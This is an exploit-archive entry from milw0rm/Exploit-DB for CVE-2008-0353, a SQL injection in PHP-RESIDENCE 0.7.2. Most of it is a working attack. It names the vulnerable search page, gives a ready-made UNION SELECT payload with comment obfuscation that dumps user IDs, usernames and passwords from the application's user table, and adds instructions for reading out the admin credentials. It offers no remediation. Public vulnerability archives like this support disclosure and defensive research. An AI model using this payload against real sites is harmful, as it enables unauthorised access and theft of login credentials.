PHP-RESIDENCE 0.7.2 Search Remote SQL Injection Vulnerability

2008-01-16T00:00:00
ID EDB-ID:4925
Type exploitdb
Reporter Khashayar Fereidani
Modified 2008-01-16T00:00:00

Description

PHP-RESIDENCE 0.7.2 (Search) Remote SQL Injection Vulnerability. CVE-2008-0353. Webapps exploit for php platform

                                        
                                            #####################################################################################
####                PHPRESIDENCE 0.7.2 Remote Sql Injection                      ####
####                              BY IRCRASH                                     ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm)                                                        #
#                                                                                   #
#Script Download : http://www.digitaldruid.net/download/php-residence_0.7.2.zip     #
#                                                                                   #
#Vulnerability Page: http://site.com/path/visualizza_tabelle.php?id_sessione=&anno=2006&tipo_tabella=clienti
#                                                                                   #
#Search query : 99999'union/**/select/**/idutenti,nome_utente,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/utenti/*
#                                                                                   #
#Help : Go Vulnerability Page and Type Search Query in the textbox . Now you can    #
#        see Admin Username And Password                                            #
#                                                                                   #
#                        Our site : HTTP://IRCRASH.COM                              #
#                                                                                   #
#####################################################################################

# milw0rm.com [2008-01-16]